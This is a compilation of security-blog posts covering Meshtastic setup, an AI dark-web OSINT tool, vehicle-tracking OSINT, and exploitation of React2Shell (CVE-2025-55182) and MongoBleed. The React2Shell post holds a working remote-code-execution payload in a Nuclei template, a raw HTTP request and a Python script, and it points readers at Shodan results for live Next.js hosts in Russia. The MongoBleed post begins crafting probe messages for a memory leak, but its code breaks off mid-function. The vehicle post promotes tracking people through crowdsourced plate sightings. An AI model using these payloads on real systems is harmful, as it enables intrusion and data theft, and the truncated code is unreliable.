
Off-Grid Communications, Part 2: Getting Started with Meshtastic on LILYGO T-Echo Device

22 January 2026 at 10:17

Welcome back, aspiring cyberwarriors!

Traditional methods of communication leave us vulnerable and reliant on systems controlled by companies and governments that have demonstrated they can’t be trusted with our data. Cell towers can be turned off, internet connections can be monitored, and messaging apps can be hacked or give your messages to the government without telling you. Meshtastic lets you build your own communication network that works completely on its own, without any central authority.

In this article, we will configure Meshtastic firmware on the Lilygo T-Echo device and connect it to the mesh network. Let’s get rolling!

What is Lilygo T-Echo?

Source: https://lilygo.cc

The Lilygo T-Echo is a small device that has a Nordic nRF52840 chip, a Semtech SX1262 LoRa radio, and an e-paper screen. This configuration makes it great for mesh networking when you need long battery life and long-range communication. The device can talk to other Meshtastic nodes from several kilometers away in cities and possibly tens of kilometers away in open areas, all while using very little power. You can find a list of devices compatible with Meshtastic at the link. The installation process will be similar to that of the Lilygo T-Echo, but different countries use different frequency ranges, so take this into account when purchasing a device.

Step #1: Install the Meshtastic Firmware

Before your T-Echo or any other Meshtastic-compatible device can join a mesh network, you need to flash it with the Meshtastic firmware. The device ships with factory firmware that needs to be replaced with the Meshtastic software stack.

First, navigate to the official Meshtastic web flasher at flasher.meshtastic.org. You will see options for different device types and firmware versions.

Choose your device from the list and the firmware version. After that, connect your Lilygo T-Echo to your computer using a USB-C cable and click Flash.

You might need to trigger DFU mode. To do so, just click Button 1, as shown in the screenshot below.

Source: https://meshtastic.org/

Next, download the UF2 file and copy it to the DFU drive that appears. Once the transfer is complete, the device will automatically reboot and start with the new firmware.

Next, hold down button 2 to select your region and generate a random node name.

Step #2: Install the Meshtastic Mobile Application

To interact with your T-Echo from your smartphone, you need to install the official Meshtastic application. This app serves as your primary interface for sending messages, viewing the mesh network, and configuring your device settings.

On Android devices, open the Google Play Store or F-Droid and search for “Meshtastic.” The official application is published by Meshtastic LLC and should appear at the top of your search results.

The app requires several permissions, including Bluetooth access and location services, which are necessary for communicating with your T-Echo and displaying your position on the mesh if you choose to share location data.

Once the installation completes, open the Meshtastic app. You will be greeted with a welcome screen like the one below.

Step #3: Pair Your T-Echo with Your Smartphone

Now comes the important step of connecting your phone to your T-Echo device. This pairing process creates a secure Bluetooth link that lets your phone set up the device and send messages through it.

In the Meshtastic mobile app, look for a Scan button. The app will begin scanning for nearby Meshtastic devices that are broadcasting their availability over Bluetooth.

Tap on your T-Echo’s name in the device list to initiate the pairing process. The app will attempt to establish a connection with the device. During this process, the app may require you to enter a PIN code displayed on your T-Echo’s screen, though this security feature is not always enabled by default.

Once the pairing completes successfully, the app interface will change to show that you are connected to your device. You should see your node name at the top of the screen, along with battery level, signal strength, and other status information.

At this point, your phone can communicate with your T-Echo, but you are not yet part of a mesh network unless there are other Meshtastic nodes within radio range. The connection you have established is purely between your phone and your device over Bluetooth. The mesh networking happens over the LoRa radio, which operates independently of the Bluetooth connection.

Step #4: Customize Your Node Configuration

Open the Meshtastic app and go to the settings menu, indicated by a gear icon. In the settings, you will find several categories, including Device, Radio Configuration, Module Configuration, and more.

Start with the User settings. Here you can change your node’s name from the randomly generated default to something more meaningful. Tap on the Long Name field and enter a name that identifies you or your device. This name will be visible to other users on the mesh, so choose something appropriate. You can use up to 40 characters, though shorter names are generally better for display purposes. Below the long name, you will see a Short Name field limited to four characters.

In the Radio Configuration section, you will find settings that control how your T-Echo communicates over the LoRa radio. The most important setting here is the Region, which must be set correctly for your geographic location to comply with local radio regulations. For users in North America, select US. European users should select their specific country or the general EU_868 or EU_433 option depending on the frequency band they are using.

The Modem Preset determines the balance between range, speed, and reliability for your radio communications. The default setting is typically Long Fast, which provides a good compromise for most users. This preset uses a spreading factor of 11, trading some speed for range while maintaining reasonable data rates for text messaging.

The Number of Hops setting controls how many times a message can be retransmitted through the mesh before it is dropped. The default value of 3 is suitable for most networks, enabling messages to travel through multiple nodes to reach distant recipients without generating excessive radio traffic. Besides that, you will find options for enabling various Meshtastic features, like MQTT, GPS, and Telemetry. We’ll explore these topics in future articles.
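If you prefer a terminal, the Meshtastic Python CLI can apply the same settings over a USB connection. Below is a minimal sketch, assuming a US region and the defaults discussed above; adjust the values for your device and location:

kali> pip install meshtastic

kali> meshtastic --set lora.region US --set lora.modem_preset LONG_FAST --set lora.hop_limit 3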

Important Note: By default, all nodes use a common encryption key, which means anyone with a Meshtastic device can read your messages. You can create private channels, but that is beyond the scope of this article.

Step #5: Send Your First Message

In the Meshtastic app, navigate to the Messages tab or screen. You will see a list of available channels. The LongFast channel is created by default and is where most mesh communication happens. Tap on this channel to open the message interface.

At the bottom of the screen, you will find a text input field where you can write your message. Please remember that Meshtastic is meant for short text messages, with a limit of 200 characters. Tap the send button to transmit your message.
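As a side note, if your node is also connected to a computer over USB, the Meshtastic CLI mentioned earlier can send the same broadcast without the app; a sketch:

kali> meshtastic --sendtext "Hello mesh"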

Your T-Echo will receive the message from your phone over Bluetooth and then broadcast it over the LoRa radio. If there are other Meshtastic nodes within range, they will receive your message and display it to their users. If your message needs to reach a node that is not in direct radio range, intermediate nodes will automatically relay it through the mesh until it reaches its destination or the hop limit is exceeded.

You will see your message appear in the conversation thread with a timestamp. If other nodes are present on the mesh, you may see responses or other messages from those users. In my case, you can see that someone reacted to my message with an emoji. Besides that, the T-Echo notifies you on its screen when you receive a new message, and you can switch to the Messages tab by pressing Button 2.

Summary

In a world where our communications are constantly monitored, logged, and sold to the highest bidder, Meshtastic running on affordable hardware like the Lilygo T-Echo offers a way to communicate independently. This technology puts the power back in your hands, letting you create mesh networks that work completely outside the control of telecom companies and government surveillance. Whether you’re coordinating security in areas without cell coverage, preparing backup communications for when regular systems fail, or simply want to talk to your team without companies reading every word, Meshtastic gives you the tools you need.

Keep coming back, aspiring off-grid users! We’re diving deeper into this topic, so stay tuned for more updates.

Artificial Intelligence in Cybersecurity, Part 8: AI-Powered Dark Web Investigations

14 January 2026 at 09:03

Welcome back, aspiring cyberwarriors!

If you’ve ever conducted an OSINT investigation, you probably know that the dark web is one of the hardest places to investigate. Whether you’re tracking ransomware groups or looking for leaked passwords, manually searching through dark web results takes hours and gives you mostly junk and malware. This is where AI can change how you investigate. By using Large Language Models, we can improve our searches and filter results faster. To do this, we have a tool called Robin.

In this article, we’ll explore how to install this tool, how to use it, and what features it provides. Let’s get rolling!

What is Robin?

Robin is an open-source tool for investigating the dark web. It uses AI to improve your searches, filter results from dark web search engines, and summarize what you find. What makes Robin particularly valuable is its multi-model support. You can easily switch between OpenAI, Claude, Gemini, or local models like Ollama depending on your needs, budget, and privacy requirements. The tool is CLI-first, built for terminal users who want to integrate dark web intelligence into their existing workflows.

Step #1: Install Robin

For this demonstration, I’ll be using a Raspberry Pi as the hacking platform, but you can easily replicate all the steps using Kali or any other Debian-based distribution. To install the tool, we can either use the source code from GitHub or Docker. I will choose the first option. To begin, clone the repository first:

pi> git clone https://github.com/apurvsinghgautam/robin.git

As shown in the downloaded files, this is a Python project. We need to create a virtual environment and install the required packages.

pi> python -m venv venv

pi> source venv/bin/activate

pi> pip3 install -r requirements.txt

Before Robin can search the dark web, you need Tor running on your system. Install Tor by opening your terminal and executing the following command:

pi> sudo apt install tor
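On Debian-based systems, the Tor service usually starts automatically after installation. If it doesn't, start it manually and verify that the SOCKS proxy is listening on its default port, 9050:

pi> sudo systemctl start tor

pi> ss -lnt | grep 9050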

Step #2: Configure Your API Key

In this demonstration, I will be using Google’s Gemini models. You can easily create an API key in Google AI Studio to access the models. If you open the config.py file, you will see which models the tool supports.

Robin can be configured using either a .env file or system environment variables. For most users, creating a .env file in your Robin directory provides the cleanest approach. This method keeps your API credentials organized and makes it easy to switch between different configurations. Open the file in your preferred text editor and add your Gemini API key.
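As a sketch, the .env file needs just a single line with your key. The exact variable name Robin expects is defined in config.py, so verify it there; GEMINI_API_KEY is assumed here:

GEMINI_API_KEY=your-api-key-here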

Step #3: Execute Your First Dark Web Investigation

First, let’s open the help screen to see which options this tool supports and to verify that we installed it correctly.

pi> python3 main.py --help

Currently, we can see two supported modes for using this tool: CLI and web UI. I prefer CLI, so I will demonstrate that. Let’s explore the help screen of the CLI mode.

pi> python3 main.py cli --help

It’s a straightforward help screen; we simply need to specify an LLM model and our query. Let’s search for credential exposure.

pi> python3 main.py cli -m gemini-2.5-flash -q "sensitive credentials exposure"

After a few minutes of processing, Robin printed the gathered information to the terminal. By default, the output is formatted in Markdown and saved to a file named after the current date and time. To view the results with Markdown formatting, I’ll use a command-line tool called glow.

pi> glow summary-xx-xx.md

The analysis examined various Tor-based marketplaces, vendors, and leak sources that advertise stolen databases and credentials. The findings reveal a widespread exposure of personally identifiable information (PII), protected health information (PHI), financial data, account credentials, and cryptocurrency private keys associated with major global organizations and millions of individuals. The report documents active threat actors, their tactics, and methods of monetization. Key risks have been identified, along with recommended next steps.

Understand the Limitations

While Robin is a powerful tool for dark web OSINT, it’s important to understand its limits. The tool uses dark web search engines, which only index a small part of what’s actually on hidden services. Many dark websites block indexing or require you to log in, so Robin can’t reach them through automated searches. For thorough investigations, you’ll still need to add manual research and other OSINT methods to what Robin finds.

The quality of Robin’s intelligence summaries depends a lot on the LLM you’re using and the quality of what it finds. Gemini 2.5 Flash gives great results for most investigations, but the AI can only work with the information in the search results. If your search doesn’t match indexed content, or if the information you need is behind a login wall, Robin won’t find it.

Summary

Conducting investigations on the dark web can be time-consuming when using traditional search tools. Since the dark web relies on anonymity networks, isn’t indexed by standard search engines, and contains a vast amount of irrelevant information, manual searching can often be slow and ineffective. Robin addresses these challenges by leveraging AI to enhance your searches, intelligently filter results, and transform findings into useful intelligence reports. While this tool does have limitations, it can be a valuable addition to your arsenal when combined with manual searching and other OSINT tools.

If you’re interested in deepening your knowledge of OSINT investigations or even starting your own investigation business, consider exploring our OSINT training to enhance your skills.

React2Shell Vulnerability Exploited to Build Massive IoT Botnet

8 January 2026 at 08:56

Welcome back, aspiring cyberwarriors!

In our industry, we often see serious security flaws that change everything overnight. React2Shell is one of those flaws. On December 3, 2025, security researchers found CVE-2025-55182, a critical bug with a perfect 10.0 severity score that affects React Server Components and Next.js applications. Within hours of going public, hackers started using this bug to break into IoT devices and web servers on a massive scale. By December 8, security teams saw widespread attacks targeting companies across multiple industries, from construction to entertainment.

What makes React2Shell so dangerous is how simple it is to use. Attackers only need to send one malicious HTTP request to take complete control of vulnerable systems. No complicated steps, no extra work required, just one carefully crafted message and the attacker owns the target.

In this article, we’ll explore the roots of React2Shell and how we can exploit this vulnerability in IoT devices.

The Technical Mechanics of React2Shell

React2Shell takes advantage of how React Server Components handle the React Flight protocol, the wire format that moves server-rendered components of the web framework around. You can think of React Flight as the language that React Server Components use to communicate. When we talk about deserialization vulnerabilities like React2Shell, we’re talking about data that’s supposed to be formatted a certain way being misinterpreted by the code that receives it. To learn more about deserialization, check our previous article.

Internally, the deserialization payload takes advantage of how React handles Chunks, which are basic building blocks that define what React should render, display, or run. A chunk is basically a building block of a web page – a small piece of data that the server evaluates to render or process the page on the server instead of in the browser. Essentially, all these chunks are put together to build a complete web page with React.

In this vulnerability, the attacker crafts a Chunk that includes a then method. When React Flight sends this data to React Server Components, React treats the value as thenable, something that behaves like a Promise. Promises are essentially a way for code to say it does not have the result of something yet but will run some code and provide the results later. React’s automatic handling, or rather misinterpretation, of these promised values is what this exploit abuses.

Implementation of Chunk.prototype.then from the React source

Chunks are referenced with the "$@" token. The attacker has figured out a way to express state within the request forged to the server. By setting the status to "resolved_model", the attacker tricks React Flight into thinking it has already fulfilled the data in chunk zero. Essentially, the attacker has forged the lifecycle of the request to be further along than it actually is. Because React Server Components resolve this as a thenable due to the then method, execution follows a code path that eventually runs malicious code.

When Chunk 1 is evaluated, React observes that it is thenable, meaning it appears as a Promise. It will refer to Chunk 0 and then attempt to resolve the forged then method. Since the attacker now controls the then resolution path, React Server Components has been tricked into a code path which the attacker ultimately controls. When formData.get is set to a value which resolves to a constructor, React treats that field as a reference to a constructor function that it should hydrate during processing of the blob value. This becomes critical because "$B" values are rehydrated by React, which must subsequently invoke the constructor.

This makes "$B" the execution pivot. By compelling React to hydrate a Blob-like value, React is forced to execute the constructor that the attacker smuggled into formData.get. Since that constructor resolves to the malicious thenable function, React executes the code as part of its hydration process. Lastly, by defining the _prefix field, the attacker prepends malicious code to the executable code path. By appending two forward slashes to the payload, the attacker tells JavaScript to treat the rest as a comment, allowing execution of only the attacker’s code while avoiding syntax errors, quite similar to SQL injection.

Fire Up the PoC

Before working with the exploit, let’s go to Shodan and see how many active sites on Next.js it has indexed.

As you can see, the query http.component:"Next.js" 200 country:"ru" returned more than a thousand results. But of course, not all of them are vulnerable. To check, we can use the following template for Nuclei.

id: cve-2025-55182-react2shell

info:
  name: Next.js/React Server Components RCE (React2Shell)
  author: assetnote
  severity: critical
  description: |
    Detects CVE-2025-55182 and CVE-2025-66478, a Remote Code Execution vulnerability in Next.js applications using React Server Components.
    It attempts to execute 'echo $((1337*10001))' on the server. If successful, the server returns a redirect to '/login?a=13371337'.
  reference:
    - https://github.com/assetnote/react2shell-scanner
    - https://slcyber.io/research-center/high-fidelity-detection-mechanism-for-rsc-next-js-rce-cve-2025-55182-cve-2025-66478
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cve-id:
      - CVE-2025-55182
      - CVE-2025-66478
  tags: cve, cve2025, nextjs, rce, react

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
        Next-Action: x
        X-Nextjs-Request-Id: b5dce965
        X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad

        ------WebKitFormBoundaryx8jO2oVc6SWP3Sad
        Content-Disposition: form-data; name="0"

        {"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('echo $((1337*10001))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
        ------WebKitFormBoundaryx8jO2oVc6SWP3Sad
        Content-Disposition: form-data; name="1"

        "$@0"
        ------WebKitFormBoundaryx8jO2oVc6SWP3Sad
        Content-Disposition: form-data; name="2"

        []
        ------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "/login?a=13371337"
          - "X-Action-Redirect"
        condition: and

Next, this command will show whether the web application is vulnerable.

kali> nuclei -silent -u http://<ip>:3000 -t react2shell.yaml

In addition, on GitHub you can find scanners in different programming languages that do exactly the same thing. Here is an example of a solution from Malayke:

You can create a test environment for this vulnerability with just a few commands:

kali> npx create-next-app@16.0.6 my-cve-2025-66478-app

kali> cd my-cve-2025-66478-app

kali> npm run dev

The commands above create a new Next.js application named my-cve-2025-66478-app using version 16.0.6 of the official setup tool, without installing anything globally. If you open localhost:3000 in your browser, you will see the following.

At this stage, we can proceed to exploit the vulnerability. Open your preferred web proxy, such as Burp Suite or ZAP. In this case, I will be using Caido (if you have not used it before, you can familiarize yourself with it in the following articles).

The algorithm is quite simple: we need to catch the request to the site and redirect it to Replay.

After that, we need to change the request from GET to POST and add a payload. The overall request looks like this:

POST / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Length: 740

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "var res=process.mainModule.require('child_process').execSync('id',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
    "_chunks": "$Q2",
    "_formData": {
      "get": "$1:constructor:constructor"
    }
  }
}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

As a result, the id command was executed.
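If you prefer to script this against your own lab instance instead of replaying it through a proxy, the same request can be sent with a few lines of Python. This is a minimal sketch for the local test app from the previous step; the payload string is copied verbatim from the request above, and requests is the only dependency.

import requests

# Target: the local Next.js lab instance created earlier - do not aim this elsewhere
URL = "http://localhost:3000/"
BOUNDARY = "----WebKitFormBoundaryx8jO2oVc6SWP3Sad"

# The JSON payload from the raw request above, copied verbatim
payload = (
    '{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,'
    '"value":"{\\"then\\":\\"$B1337\\"}","_response":{'
    '"_prefix":"var res=process.mainModule.require(\'child_process\')'
    '.execSync(\'id\',{\'timeout\':5000}).toString().trim();;'
    'throw Object.assign(new Error(\'NEXT_REDIRECT\'),{digest:`${res}`});",'
    '"_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}'
)

# Assemble the three multipart form fields exactly as in the raw request
body = "\r\n".join([
    f"--{BOUNDARY}", 'Content-Disposition: form-data; name="0"', "", payload,
    f"--{BOUNDARY}", 'Content-Disposition: form-data; name="1"', "", '"$@0"',
    f"--{BOUNDARY}", 'Content-Disposition: form-data; name="2"', "", "[]",
    f"--{BOUNDARY}--", "",
])

headers = {
    "Next-Action": "x",
    "X-Nextjs-Request-Id": "b5dce965",
    "X-Nextjs-Html-Request-Id": "SSTMXm7OJ_g0Ncx6jpQt9",
    "Content-Type": f"multipart/form-data; boundary={BOUNDARY}",
}

response = requests.post(URL, headers=headers, data=body.encode())
print(response.status_code)
# The id output comes back inside the thrown NEXT_REDIRECT digest
print(response.headers.get("X-Action-Redirect") or response.text[:500])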

Observed Attack Patterns

Security researchers have identified multiple instances of React2Shell attacks across different systems. The similar patterns observed in these cases reveal how the attacker operates and which tools they use, at least during the early days following the vulnerability’s disclosure.

In the first case, on December 4, 2025, the attacker broke into a vulnerable Next.js system running on Windows and tried to download an unknown file using curl and bash commands. They then tried to download a Linux cryptocurrency miner. About 6 hours later, they tried to download a Linux backdoor. The attackers also ran commands like whoami and echo, which researchers believe was a way to test if commands would run and figure out what operating system was being used.

In the second case, on another Windows computer, the attacker tried to download multiple files from their control servers. Interestingly, the attacker ran the command ver || id, which is a trick to figure out if the system is running Windows or Linux. The ver command shows the Windows version, while id shows user information on Linux. The double pipe operator makes sure the second command only runs if the first one fails, letting the attacker identify the operating system. Like before, the attacker also ran a command to test if their code would run, followed by commands like whoami and hostname to gather user and system information.

In the third case, the attacker followed the same pattern. They first ran commands to test if their code would work and used commands like whoami to gather user information. The attacker then tried to download multiple files from their control servers. The commands follow the same approach: download a shell script, run it with bash, and sometimes delete it to hide evidence.

Unlike the earlier Windows cases, the fourth case targeted a Linux computer running a Next.js application. The attacker successfully broke in and installed an XMRig cryptocurrency miner.

Based on the similar pattern seen across multiple computers, including identical tests and control servers, researchers believe the attacker is likely using automated hacking tools. This is supported by the attempts to use Linux-specific files on Windows computers, showing that the automation doesn’t tell the difference between operating systems. On one of the hacked computers, log analysis showed evidence of automated vulnerability scanning before the attack. The attacker used a publicly available GitHub tool to find vulnerable Next.js systems before launching their attack.

RondoDox Campaign

Security researchers have found a nine-month campaign targeting IoT devices and web applications to build a botnet called RondoDox. This campaign started in early 2025 and has grown through three phases, each one bigger and more advanced than the last.

The first phase ran from March through April 2025 and involved early testing and manual scanning for vulnerabilities. During this time, the attackers were testing their tools and looking for potential targets across the internet. The second phase, from April through June 2025, saw daily mass scanning targeting web applications like WordPress, Drupal, and Struts2, along with IoT devices such as Wavlink routers. The third phase, starting in July and continuing through early December 2025, marked a shift to hourly automated attacks on a large scale, showing the operators had improved their tools and were ready for mass attacks.

When React2Shell was disclosed in December 2025, the RondoDox operators immediately added it to their toolkit alongside other N-day vulnerabilities, including CVE-2023-1389 and CVE-2025-24893. The attacks detected in December follow a consistent pattern. Attackers scan to find vulnerable Next.js servers, then try to install multiple payloads on infected devices. These payloads include cryptocurrency miners, botnet loaders, health checkers, and Mirai botnet variants. The infection chain is designed to stay on systems and resist removal attempts.

A large portion of the attack traffic comes from a datacenter in Poland, with one IP address alone responsible for more than 12,000 React2Shell-related events, along with port scanning and attempts to exploit known Hikvision vulnerabilities. This behavior matches patterns seen in Mirai-derived botnets, where compromised infrastructure is used both for scanning and for launching multi-vector attacks. Additional scanning comes from the United States, the Netherlands, Ireland, France, Hong Kong, Singapore, China, Panama, and other regions, showing broad global participation in opportunistic attacks.

Mitigation

CVE-2025-55182 exists in several versions, including 19.0.0, 19.1.0, 19.1.1, and 19.2.0, of the following packages: react-server-dom-webpack, react-server-dom-parcel, and react-server-dom-turbopack. Businesses relying on any of these impacted packages should update immediately.
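To check whether a project pulls in one of the affected packages, you can query its npm dependency tree, for example:

kali> npm ls react-server-dom-webpack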

Summary

Cyberwarriors need to make sure their systems are safe from new threats. The React2Shell vulnerability is a serious risk for organizations using React Server Components and Next.js applications. Hackers can exploit this vulnerability to steal personal data, corporate data, and attack critical infrastructure by installing malware. This vulnerability is easy to exploit, and many organizations use the affected software, which has made it popular with botnet operators who’ve quickly added React2Shell to their attack tools. Organizations need to patch right away, use multiple layers of defense, and watch their systems closely to protect against this threat. A vulnerability like React2Shell can take down entire networks if even one application is exposed.

Open Source Intelligence (OSINT): Tools and Techniques for Vehicle Investigation, Part 1

31 December 2025 at 12:45

Welcome back, aspiring cyberwarriors!

Today, vehicles are everywhere, and overlooking them during an OSINT investigation would be a serious mistake. Every car leaves behind a trail of digital and photographic evidence through its license plates, identification numbers, and physical presence in public spaces. Unlike traditional methods that rely on privileged access to government records, modern vehicle OSINT utilizes publicly available resources, community-sourced data, and open registries to construct detailed intelligence profiles.

In this article, we will look at four services that can help you jump-start your vehicle OSINT investigation. Let’s get rolling!

Understanding License Plate Intelligence

The first thing we’ll see during car OSINT is the license plate. Plates are one of the most recognizable vehicle identifiers worldwide, but their formats, designs, and information structures vary from one region to another. To determine which country a license plate belongs to, we can use the website worldlicenseplates.com.

This website serves as a visual reference, cataloging plate designs from nearly every country and region. For instance, let’s check Russian license plates.

On this site you can view different license plate types and how they evolved over time. It also displays government, police, military, and other unique plate styles for easier identification during OSINT work.

Aggregating Search Tools for Plate Research

There are many databases that allow you to gather information about vehicles by entering a plate number, but instead of searching multiple services across different jurisdictions, you can use a tool created by Cyber Detective called Vehicle Number Search Toolbox. It serves as a navigation hub that directs investigators to the most relevant lookup tools for each country.

By selecting a country and entering a license plate number, the website redirects you to the appropriate database for that jurisdiction. Below, for example, is a sample report for a vehicle registered in the United Kingdom.

In addition to plate lookup tools, it is worth mentioning a service called Nomerogram. This is a community-driven platform where users upload and share photographs and sightings of license plates across Russia.

Unlike Western equivalents that focus primarily on vehicle specifications or collector interests, Nomerogram emphasizes geolocation and movement tracking. Users upload photographs of vehicles they encounter, tagging them with location and timestamp information, gradually building a distributed surveillance network that maps vehicle movements across vast geographic areas.

Crowdsourced Vehicle Photography and Tracking

Another useful platform for finding vehicle images by license plate is Platesmania. It functions as a global community of car enthusiasts who photograph and upload interesting or unique plates along with the vehicles they belong to. The site works much like a social network focused on automotive photography, where users contribute photos from daily observations and explore uploads from others.

The search functionality allows anyone to query specific plate numbers and retrieve all associated photographs uploaded to the platform. Each photograph includes the location where it was taken, the date and time, and typically shows the complete vehicle along with surrounding context.

Interestingly, government vehicles, diplomatic plates, and personalized or unique registrations often receive special attention from contributors, which can inadvertently result in detailed tracking datasets over time.

Summary

In this article we explored how to identify license plates by visual characteristics, access jurisdiction-specific databases, and utilize crowdsourced photography platforms to track vehicle movements across different regions.

To continue learning and sharpening your investigative abilities, be sure to explore our OSINT Investigator Bundle.


Database Hacking: Get Started with MongoBleed Vulnerability

29 December 2025 at 10:20

Welcome back, my aspiring cyberwarriors!

Recently, MongoDB disclosed a critical security vulnerability that security researchers quickly dubbed “MongoBleed” in reference to its similarity to the infamous Heartbleed vulnerability that affected OpenSSL years earlier. Just as Heartbleed allowed attackers to extract memory from vulnerable web servers, MongoBleed enables unauthenticated attackers to leak sensitive data from MongoDB server memory without any credentials or authentication.

In this article, we will briefly discuss NoSQL databases, explore the origins of MongoBleed, and finally walk through the exploitation process in a lab environment. Let’s get rolling!

What are NoSQL Databases?

Before diving into the vulnerability itself, it is essential to have some understanding of databases in general and what MongoDB is.

Relational databases (RDBMS), such as MySQL, are very common, and at Hackers-Arise, you can find a set of articles covering how they might be hacked. However, when an application needs to handle large amounts of data with high speed and reliability, developers may need a different solution. This is where NoSQL databases come in.

NoSQL systems like MongoDB offer an alternative to traditional SQL databases. They are popular today because they are easy to use, scale well both horizontally and vertically, and provide flexible data storage. Unlike relational databases, NoSQL does not force data into fixed tables and rows. Instead, developers can store data in the format that best suits their needs.

NoSQL databases come in four main types, as shown on the image below.

Source: https://www.geeksforgeeks.org/

Among them, document databases are the most widely used. They store data in document format, making it easy to search and structure. In document databases, a “document” replaces a table row, and a “collection” replaces a table. MongoDB is a document database that stores data as flexible BSON (Binary JSON) documents.
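To make the document model concrete, here is a minimal PyMongo sketch, assuming a MongoDB instance on localhost. Note that the two documents in the same collection carry different fields:

from pymongo import MongoClient

client = MongoClient("mongodb://localhost:27017")
db = client["shop"]          # database
products = db["products"]    # collection (the "table")

# Each document (the "row") can have its own shape - no fixed schema
products.insert_one({"name": "LoRa board", "price": 25.0, "tags": ["radio", "iot"]})
products.insert_one({"name": "Antenna", "price": 7.5, "specs": {"gain_dbi": 3}})

print(products.find_one({"name": "Antenna"}))
client.close()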

Understanding the Vulnerability

MongoBleed takes advantage of a flaw in how MongoDB’s network layer processes compressed messages. To understand it fully, we need to look at how the MongoDB wire protocol works, how zlib compression fits into it, and where the vulnerability appears in that process.

MongoDB Wire Protocol Basics

MongoDB clients and servers communicate using a binary protocol that exchanges messages over TCP connections. Each message consists of a header containing metadata like message length and operation type, followed by the actual message body containing the command or response data. When compression is enabled, this body section gets compressed before transmission and must be decompressed by the receiver before processing.

The wire protocol header includes a field indicating the total message length, which the receiver uses to know how much data to read from the network socket. For compressed messages, there’s an additional header containing information about the compression algorithm used and the claimed uncompressed size of the data. This uncompressed size field is important to understanding the vulnerability, as it tells MongoDB how much memory to allocate for holding the decompressed data.

How Zlib Compression Works

Zlib is a widely-used compression library that implements the DEFLATE algorithm. A simplified view of the DEFLATE algorithm is shown below.

When MongoDB enables zlib compression, outgoing messages get compressed before transmission and incoming compressed messages get decompressed upon receipt. The compression process reduces the network bandwidth required for communication, which can significantly improve performance when clients and servers communicate over limited or high-latency networks.

The decompression process requires allocating a buffer large enough to hold the uncompressed data. The compressed message includes a field stating how much space the uncompressed form will require, and MongoDB reads this value to allocate an appropriately sized buffer. The zlib decompression function then writes the decompressed data into this buffer, returning a value indicating how many bytes were actually written.
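The key detail is the return value. A quick Python illustration: zlib tells the caller how many bytes it actually produced, and it is the caller's job to trust that number instead of the size of the buffer it allocated.

import zlib

original = b"A" * 500
compressed = zlib.compress(original)

# max_length mirrors the allocated output buffer (e.g., a claimed 50,000 bytes)
decompressor = zlib.decompressobj()
output = decompressor.decompress(compressed, 50_000)

print(len(compressed))  # small payload on the wire
print(len(output))      # bytes actually written: 500, not 50,000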

If you struggle to understand how compression works, consider checking our Cryptography Basics for Hackers training.

The Vulnerability Mechanism

An attacker crafts a malicious MongoDB wire protocol message that claims an unrealistically large uncompressed size. For example, they might send a message whose compressed payload is only 100 bytes but claims it will decompress to 50,000 bytes. MongoDB, trusting this claim, allocates a 50,000-byte buffer to hold the decompressed data.

The zlib library then decompresses the actual 100 bytes of compressed data, which expands to perhaps 500 bytes of uncompressed data. Zlib writes these 500 bytes to the beginning of the 50,000-byte buffer and returns a value indicating that it wrote 500 bytes. However, due to the bug in MongoDB’s implementation, the server doesn’t properly verify this return value against the claimed uncompressed size. Instead, it treats the entire 50,000-byte buffer as if it contains valid decompressed data.

When MongoDB then parses this buffer as BSON, the parser reads field names and values sequentially through the buffer. It successfully parses the first 500 bytes of legitimate decompressed data, but then continues reading into the remaining 49,500 bytes of uninitialized memory. In C and C++ programming, uninitialized memory contains whatever data happened to be there from previous operations rather than being zeroed out. This memory space might contain fragments of previous MongoDB operations, other clients’ queries, configuration data, or any other information that recently resided in that memory region.

The BSON parser continues reading through this uninitialized memory region, interpreting random bytes as field names until it encounters null bytes (0x00) which mark the end of field names in the BSON format. By carefully choosing different claimed uncompressed sizes in successive exploitation attempts, an attacker can probe different regions of memory, extracting varying chunks of data and slowly reconstructing complete sensitive information.
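To make that framing concrete, here is a minimal Python sketch of how such a message is laid out on the wire, following the OP_COMPRESSED layout from the MongoDB wire protocol documentation. It only builds the bytes; a working exploit such as the PoC used below must also negotiate zlib compression with the server during the initial hello exchange.

import struct
import zlib

OP_COMPRESSED = 2012  # wire protocol opcode for compressed messages
OP_MSG = 2013         # the opcode of the message being wrapped

def build_probe(claimed_size: int) -> bytes:
    # Minimal OP_MSG body: flagBits (0), section kind 0, empty BSON document {}
    inner = struct.pack("<I", 0) + b"\x00" + bytes.fromhex("0500000000")
    compressed = zlib.compress(inner)
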